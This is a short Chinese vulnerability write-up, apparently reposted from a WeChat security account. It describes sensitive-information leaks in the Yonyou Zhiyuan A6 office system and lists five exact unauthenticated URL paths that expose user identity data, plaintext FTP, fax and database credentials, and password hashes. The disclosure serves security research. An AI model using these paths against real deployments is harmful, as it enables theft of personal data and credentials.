一、漏洞描述
用友致远A6协同管理系统:面向广大的企事业组织应用设计,是一个基于互联网的高效协同工作平台和优秀的协同管理系统。它融入先进的协同管理理念,运用领先的网络技术,切实有效的解决企事业组织工作管理中的关键应用。利用它可把日常管理中的业务、事务、事件等信息在单位、部门、组群、个人之间进行及时高效、有序可控、全程共享的沟通和处理。是一套非常适合国情的、并具有很高性价比的软件。
用友致远A6协同管理系统对敏感文件的访问权限设置不当,导致了多处敏感信息泄漏。泄露的信息包括:
1)使用该系统用户的真实姓名、用户名、电话号码、邮箱、身份证、所在公司的部门、职位、工号等等
2)传真服务器的配置信息(ip地址、登录用户名/明文密码)、FTP账号/明文密码、数据库的名称/数据库用户名/明文密码等
3)获取数据库账户以及密码 MD5。
4)下载OA中的用户信息
二、漏洞复现
系统首页地址及页面显示如下
http://xx.xx.xx.xx/yyoa/index.jsp
1、initDataAssess.jsp 用户敏感信息泄露漏洞
http://xx.xx.xx.xx/yyoa/assess/js/initDataAssess.jsp
2、reloadData.jsp 用户敏感信息泄露漏洞
http://xx.xx.xx.xx/yyoa/common/SelectPerson/reloadData.jsp
这里需要查看网页源码才能看到信息
3、config.jsp 敏感信息泄漏漏洞
http://xx.xx.xx.xx/yyoa/ext/trafaxserver/SystemManage/config.jsp
4、createMysql.jsp 数据库敏感信息泄露漏洞
http://xx.xx.xx.xx/yyoa/createMysql.jsp
http://xx.xx.xx.xx/yyoa/ext/createMysql.jsp
5、DownExcelBeanServlet 用户敏感信息泄露
http://xx.xx.xx.xx/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0
原文始发于微信公众号(守卫者安全):用友致远A6协同管理系统多处敏感信息泄露
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论